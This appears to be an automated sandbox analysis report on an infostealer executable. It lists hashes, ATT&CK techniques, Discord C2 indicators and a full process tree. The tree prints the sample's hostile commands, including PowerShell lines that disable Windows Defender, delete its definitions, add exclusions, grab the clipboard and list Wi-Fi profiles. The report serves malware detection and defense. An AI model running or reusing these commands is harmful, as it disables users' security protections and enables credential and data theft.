424e22d4538725b422d138cd63d353af0cf18d4985cdda14c0b5938b0c433fda

Analysis

max time kernel
82s
max time network
79s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
25-12-2024 19:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dox neyroxx2.o.exe
Size

7.5MB
MD5

238dfb90821736dd15f98a25ea59e439
SHA1

3b24726cb7a4e0723b9dcbd375e3e5f3c240dfd0
SHA256

424e22d4538725b422d138cd63d353af0cf18d4985cdda14c0b5938b0c433fda
SHA512

88b756eb05f4212a79dad390f9af78322956e562a1c797d571d69532cdefd7f67424d45e545da78545cb76d2fa7b7be67822efbc38d7270757aaf061ec998023
SSDEEP

196608:L91dO6h6wfI9jUCnORird1KfbLOYgN2oc+nBIdAxW:Zq6XIHOQ76bynnBIf

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5100	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1628	powershell.exe
2124	powershell.exe
544	powershell.exe
4444	powershell.exe
5292	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dox neyroxx2.o.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4108	cmd.exe
1112	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1316	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe
2540	dox neyroxx2.o.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
236	tasklist.exe
2256	tasklist.exe
1876	tasklist.exe
1584	tasklist.exe
3620	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000045101-21.dat	upx
behavioral1/memory/2540-25-0x00007FFBCCF70000-0x00007FFBCD631000-memory.dmp	upx
behavioral1/files/0x00280000000450db-27.dat	upx
behavioral1/memory/2540-30-0x00007FFBE07A0000-0x00007FFBE07C5000-memory.dmp	upx
behavioral1/files/0x00290000000450e2-47.dat	upx
behavioral1/files/0x00280000000450e1-46.dat	upx
behavioral1/files/0x00280000000450e0-45.dat	upx
behavioral1/files/0x00280000000450df-44.dat	upx
behavioral1/files/0x00280000000450de-43.dat	upx
behavioral1/files/0x00280000000450dd-42.dat	upx
behavioral1/files/0x00280000000450dc-41.dat	upx
behavioral1/files/0x00280000000450da-40.dat	upx
behavioral1/files/0x002800000004510c-39.dat	upx
behavioral1/files/0x0028000000045109-38.dat	upx
behavioral1/files/0x002e000000045107-37.dat	upx
behavioral1/files/0x00240000000450fb-34.dat	upx
behavioral1/files/0x00280000000450ec-33.dat	upx
behavioral1/memory/2540-48-0x00007FFBE5BA0000-0x00007FFBE5BAF000-memory.dmp	upx
behavioral1/files/0x00310000000450f9-31.dat	upx
behavioral1/memory/2540-54-0x00007FFBDBC50000-0x00007FFBDBC7C000-memory.dmp	upx
behavioral1/memory/2540-56-0x00007FFBDBD70000-0x00007FFBDBD89000-memory.dmp	upx
behavioral1/memory/2540-58-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx
behavioral1/memory/2540-60-0x00007FFBDB6A0000-0x00007FFBDB81F000-memory.dmp	upx
behavioral1/memory/2540-62-0x00007FFBDBA50000-0x00007FFBDBA69000-memory.dmp	upx
behavioral1/memory/2540-64-0x00007FFBDBA40000-0x00007FFBDBA4D000-memory.dmp	upx
behavioral1/memory/2540-66-0x00007FFBDB3B0000-0x00007FFBDB3E3000-memory.dmp	upx
behavioral1/memory/2540-71-0x00007FFBDB2E0000-0x00007FFBDB3AE000-memory.dmp	upx
behavioral1/memory/2540-70-0x00007FFBCCF70000-0x00007FFBCD631000-memory.dmp	upx
behavioral1/memory/2540-74-0x00007FFBE07A0000-0x00007FFBE07C5000-memory.dmp	upx
behavioral1/memory/2540-73-0x00007FFBCC810000-0x00007FFBCCD43000-memory.dmp	upx
behavioral1/memory/2540-76-0x00007FFBDB680000-0x00007FFBDB694000-memory.dmp	upx
behavioral1/memory/2540-79-0x00007FFBDB670000-0x00007FFBDB67D000-memory.dmp	upx
behavioral1/memory/2540-78-0x00007FFBDBC50000-0x00007FFBDBC7C000-memory.dmp	upx
behavioral1/memory/2540-81-0x00007FFBCC050000-0x00007FFBCC16A000-memory.dmp	upx
behavioral1/memory/2540-102-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx
behavioral1/memory/2540-111-0x00007FFBDB6A0000-0x00007FFBDB81F000-memory.dmp	upx
behavioral1/memory/2540-179-0x00007FFBDBA50000-0x00007FFBDBA69000-memory.dmp	upx
behavioral1/memory/2540-207-0x00007FFBDBA40000-0x00007FFBDBA4D000-memory.dmp	upx
behavioral1/memory/2540-286-0x00007FFBDB3B0000-0x00007FFBDB3E3000-memory.dmp	upx
behavioral1/memory/2540-289-0x00007FFBDB2E0000-0x00007FFBDB3AE000-memory.dmp	upx
behavioral1/memory/2540-305-0x00007FFBCC810000-0x00007FFBCCD43000-memory.dmp	upx
behavioral1/memory/2540-319-0x00007FFBE07A0000-0x00007FFBE07C5000-memory.dmp	upx
behavioral1/memory/2540-324-0x00007FFBDB6A0000-0x00007FFBDB81F000-memory.dmp	upx
behavioral1/memory/2540-318-0x00007FFBCCF70000-0x00007FFBCD631000-memory.dmp	upx
behavioral1/memory/2540-332-0x00007FFBCC050000-0x00007FFBCC16A000-memory.dmp	upx
behavioral1/memory/2540-344-0x00007FFBCCF70000-0x00007FFBCD631000-memory.dmp	upx
behavioral1/memory/2540-372-0x00007FFBCC050000-0x00007FFBCC16A000-memory.dmp	upx
behavioral1/memory/2540-371-0x00007FFBDB670000-0x00007FFBDB67D000-memory.dmp	upx
behavioral1/memory/2540-370-0x00007FFBDB680000-0x00007FFBDB694000-memory.dmp	upx
behavioral1/memory/2540-369-0x00007FFBDB2E0000-0x00007FFBDB3AE000-memory.dmp	upx
behavioral1/memory/2540-368-0x00007FFBDB3B0000-0x00007FFBDB3E3000-memory.dmp	upx
behavioral1/memory/2540-367-0x00007FFBDBA40000-0x00007FFBDBA4D000-memory.dmp	upx
behavioral1/memory/2540-366-0x00007FFBDBA50000-0x00007FFBDBA69000-memory.dmp	upx
behavioral1/memory/2540-365-0x00007FFBDB6A0000-0x00007FFBDB81F000-memory.dmp	upx
behavioral1/memory/2540-364-0x00007FFBDBC10000-0x00007FFBDBC34000-memory.dmp	upx
behavioral1/memory/2540-363-0x00007FFBDBD70000-0x00007FFBDBD89000-memory.dmp	upx
behavioral1/memory/2540-362-0x00007FFBDBC50000-0x00007FFBDBC7C000-memory.dmp	upx
behavioral1/memory/2540-361-0x00007FFBE5BA0000-0x00007FFBE5BAF000-memory.dmp	upx
behavioral1/memory/2540-360-0x00007FFBE07A0000-0x00007FFBE07C5000-memory.dmp	upx
behavioral1/memory/2540-359-0x00007FFBCC810000-0x00007FFBCCD43000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1072	cmd.exe
4632	netsh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1528	WMIC.exe
4576	WMIC.exe
1948	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4028	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
700	WMIC.exe
700	WMIC.exe
700	WMIC.exe
700	WMIC.exe
544	powershell.exe
1628	powershell.exe
544	powershell.exe
1628	powershell.exe
1528	WMIC.exe
1528	WMIC.exe
1528	WMIC.exe
1528	WMIC.exe
4576	WMIC.exe
4576	WMIC.exe
4576	WMIC.exe
4576	WMIC.exe
2124	powershell.exe
2124	powershell.exe
3564	WMIC.exe
3564	WMIC.exe
3564	WMIC.exe
3564	WMIC.exe
1112	powershell.exe
1112	powershell.exe
772	powershell.exe
772	powershell.exe
1112	powershell.exe
772	powershell.exe
4444	powershell.exe
4444	powershell.exe
904	powershell.exe
904	powershell.exe
3736	WMIC.exe
3736	WMIC.exe
3736	WMIC.exe
3736	WMIC.exe
3564	WMIC.exe
3564	WMIC.exe
3564	WMIC.exe
3564	WMIC.exe
1156	WMIC.exe
1156	WMIC.exe
1156	WMIC.exe
1156	WMIC.exe
5292	powershell.exe
5292	powershell.exe
1948	WMIC.exe
1948	WMIC.exe
1948	WMIC.exe
1948	WMIC.exe
3404	powershell.exe
3404	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	236	tasklist.exe
Token: SeIncreaseQuotaPrivilege	700	WMIC.exe
Token: SeSecurityPrivilege	700	WMIC.exe
Token: SeTakeOwnershipPrivilege	700	WMIC.exe
Token: SeLoadDriverPrivilege	700	WMIC.exe
Token: SeSystemProfilePrivilege	700	WMIC.exe
Token: SeSystemtimePrivilege	700	WMIC.exe
Token: SeProfSingleProcessPrivilege	700	WMIC.exe
Token: SeIncBasePriorityPrivilege	700	WMIC.exe
Token: SeCreatePagefilePrivilege	700	WMIC.exe
Token: SeBackupPrivilege	700	WMIC.exe
Token: SeRestorePrivilege	700	WMIC.exe
Token: SeShutdownPrivilege	700	WMIC.exe
Token: SeDebugPrivilege	700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	700	WMIC.exe
Token: SeRemoteShutdownPrivilege	700	WMIC.exe
Token: SeUndockPrivilege	700	WMIC.exe
Token: SeManageVolumePrivilege	700	WMIC.exe
Token: 33	700	WMIC.exe
Token: 34	700	WMIC.exe
Token: 35	700	WMIC.exe
Token: 36	700	WMIC.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeIncreaseQuotaPrivilege	700	WMIC.exe
Token: SeSecurityPrivilege	700	WMIC.exe
Token: SeTakeOwnershipPrivilege	700	WMIC.exe
Token: SeLoadDriverPrivilege	700	WMIC.exe
Token: SeSystemProfilePrivilege	700	WMIC.exe
Token: SeSystemtimePrivilege	700	WMIC.exe
Token: SeProfSingleProcessPrivilege	700	WMIC.exe
Token: SeIncBasePriorityPrivilege	700	WMIC.exe
Token: SeCreatePagefilePrivilege	700	WMIC.exe
Token: SeBackupPrivilege	700	WMIC.exe
Token: SeRestorePrivilege	700	WMIC.exe
Token: SeShutdownPrivilege	700	WMIC.exe
Token: SeDebugPrivilege	700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	700	WMIC.exe
Token: SeRemoteShutdownPrivilege	700	WMIC.exe
Token: SeUndockPrivilege	700	WMIC.exe
Token: SeManageVolumePrivilege	700	WMIC.exe
Token: 33	700	WMIC.exe
Token: 34	700	WMIC.exe
Token: 35	700	WMIC.exe
Token: 36	700	WMIC.exe
Token: SeIncreaseQuotaPrivilege	544	powershell.exe
Token: SeSecurityPrivilege	544	powershell.exe
Token: SeTakeOwnershipPrivilege	544	powershell.exe
Token: SeLoadDriverPrivilege	544	powershell.exe
Token: SeSystemProfilePrivilege	544	powershell.exe
Token: SeSystemtimePrivilege	544	powershell.exe
Token: SeProfSingleProcessPrivilege	544	powershell.exe
Token: SeIncBasePriorityPrivilege	544	powershell.exe
Token: SeCreatePagefilePrivilege	544	powershell.exe
Token: SeBackupPrivilege	544	powershell.exe
Token: SeRestorePrivilege	544	powershell.exe
Token: SeShutdownPrivilege	544	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeSystemEnvironmentPrivilege	544	powershell.exe
Token: SeRemoteShutdownPrivilege	544	powershell.exe
Token: SeUndockPrivilege	544	powershell.exe
Token: SeManageVolumePrivilege	544	powershell.exe
Token: 33	544	powershell.exe
Token: 34	544	powershell.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe
5712	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5712	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 388 wrote to memory of 2540	388	dox neyroxx2.o.exe	81
PID 388 wrote to memory of 2540	388	dox neyroxx2.o.exe	81
PID 2540 wrote to memory of 472	2540	dox neyroxx2.o.exe	82
PID 2540 wrote to memory of 472	2540	dox neyroxx2.o.exe	82
PID 2540 wrote to memory of 4292	2540	dox neyroxx2.o.exe	83
PID 2540 wrote to memory of 4292	2540	dox neyroxx2.o.exe	83
PID 2540 wrote to memory of 5148	2540	dox neyroxx2.o.exe	84
PID 2540 wrote to memory of 5148	2540	dox neyroxx2.o.exe	84
PID 2540 wrote to memory of 5192	2540	dox neyroxx2.o.exe	87
PID 2540 wrote to memory of 5192	2540	dox neyroxx2.o.exe	87
PID 2540 wrote to memory of 4724	2540	dox neyroxx2.o.exe	90
PID 2540 wrote to memory of 4724	2540	dox neyroxx2.o.exe	90
PID 4292 wrote to memory of 544	4292	cmd.exe	93
PID 4292 wrote to memory of 544	4292	cmd.exe	93
PID 5192 wrote to memory of 236	5192	cmd.exe	94
PID 5192 wrote to memory of 236	5192	cmd.exe	94
PID 5148 wrote to memory of 556	5148	cmd.exe	95
PID 5148 wrote to memory of 556	5148	cmd.exe	95
PID 472 wrote to memory of 1628	472	cmd.exe	96
PID 472 wrote to memory of 1628	472	cmd.exe	96
PID 4724 wrote to memory of 700	4724	cmd.exe	97
PID 4724 wrote to memory of 700	4724	cmd.exe	97
PID 2540 wrote to memory of 5996	2540	dox neyroxx2.o.exe	100
PID 2540 wrote to memory of 5996	2540	dox neyroxx2.o.exe	100
PID 5996 wrote to memory of 3128	5996	cmd.exe	102
PID 5996 wrote to memory of 3128	5996	cmd.exe	102
PID 2540 wrote to memory of 2400	2540	dox neyroxx2.o.exe	103
PID 2540 wrote to memory of 2400	2540	dox neyroxx2.o.exe	103
PID 2400 wrote to memory of 2468	2400	cmd.exe	105
PID 2400 wrote to memory of 2468	2400	cmd.exe	105
PID 2540 wrote to memory of 2364	2540	dox neyroxx2.o.exe	106
PID 2540 wrote to memory of 2364	2540	dox neyroxx2.o.exe	106
PID 2364 wrote to memory of 1528	2364	cmd.exe	108
PID 2364 wrote to memory of 1528	2364	cmd.exe	108
PID 4292 wrote to memory of 5100	4292	cmd.exe	109
PID 4292 wrote to memory of 5100	4292	cmd.exe	109
PID 2540 wrote to memory of 940	2540	dox neyroxx2.o.exe	110
PID 2540 wrote to memory of 940	2540	dox neyroxx2.o.exe	110
PID 940 wrote to memory of 4576	940	cmd.exe	112
PID 940 wrote to memory of 4576	940	cmd.exe	112
PID 2540 wrote to memory of 5780	2540	dox neyroxx2.o.exe	113
PID 2540 wrote to memory of 5780	2540	dox neyroxx2.o.exe	113
PID 5780 wrote to memory of 2124	5780	cmd.exe	115
PID 5780 wrote to memory of 2124	5780	cmd.exe	115
PID 2540 wrote to memory of 5880	2540	dox neyroxx2.o.exe	116
PID 2540 wrote to memory of 5880	2540	dox neyroxx2.o.exe	116
PID 2540 wrote to memory of 3472	2540	dox neyroxx2.o.exe	117
PID 2540 wrote to memory of 3472	2540	dox neyroxx2.o.exe	117
PID 5880 wrote to memory of 1876	5880	cmd.exe	120
PID 5880 wrote to memory of 1876	5880	cmd.exe	120
PID 3472 wrote to memory of 2256	3472	cmd.exe	121
PID 3472 wrote to memory of 2256	3472	cmd.exe	121
PID 2540 wrote to memory of 5832	2540	dox neyroxx2.o.exe	122
PID 2540 wrote to memory of 5832	2540	dox neyroxx2.o.exe	122
PID 2540 wrote to memory of 4108	2540	dox neyroxx2.o.exe	123
PID 2540 wrote to memory of 4108	2540	dox neyroxx2.o.exe	123
PID 2540 wrote to memory of 4968	2540	dox neyroxx2.o.exe	125
PID 2540 wrote to memory of 4968	2540	dox neyroxx2.o.exe	125
PID 2540 wrote to memory of 4964	2540	dox neyroxx2.o.exe	128
PID 2540 wrote to memory of 4964	2540	dox neyroxx2.o.exe	128
PID 2540 wrote to memory of 1072	2540	dox neyroxx2.o.exe	130
PID 2540 wrote to memory of 1072	2540	dox neyroxx2.o.exe	130
PID 2540 wrote to memory of 5524	2540	dox neyroxx2.o.exe	131
PID 2540 wrote to memory of 5524	2540	dox neyroxx2.o.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5284	attrib.exe
5048	attrib.exe

C:\Users\Admin\AppData\Local\Temp\dox neyroxx2.o.exe
"C:\Users\Admin\AppData\Local\Temp\dox neyroxx2.o.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:388
- C:\Users\Admin\AppData\Local\Temp\dox neyroxx2.o.exe
  "C:\Users\Admin\AppData\Local\Temp\dox neyroxx2.o.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dox neyroxx2.o.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dox neyroxx2.o.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:544
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOOP NOOP', 0, 'CACA', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5148
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NOOP NOOP', 0, 'CACA', 0+16);close()"
      4⤵
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5192
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5996
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3472
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5832
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4968
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4964
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1072
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5524
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3240
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
